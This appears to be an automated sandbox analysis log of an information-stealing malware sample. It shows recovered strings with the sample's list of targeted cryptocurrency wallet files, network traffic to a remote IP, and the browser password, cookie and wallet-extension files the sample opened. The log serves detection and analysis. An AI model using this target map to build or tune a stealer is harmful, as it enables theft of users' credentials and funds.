Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: L8ChrKrbqV.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.walletI
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: L8ChrKrbqV.exe, 00000000.00000003.1396923044.0000000001191000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\..*
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1883190413.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.10:50024 -> 94.156.102.240:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
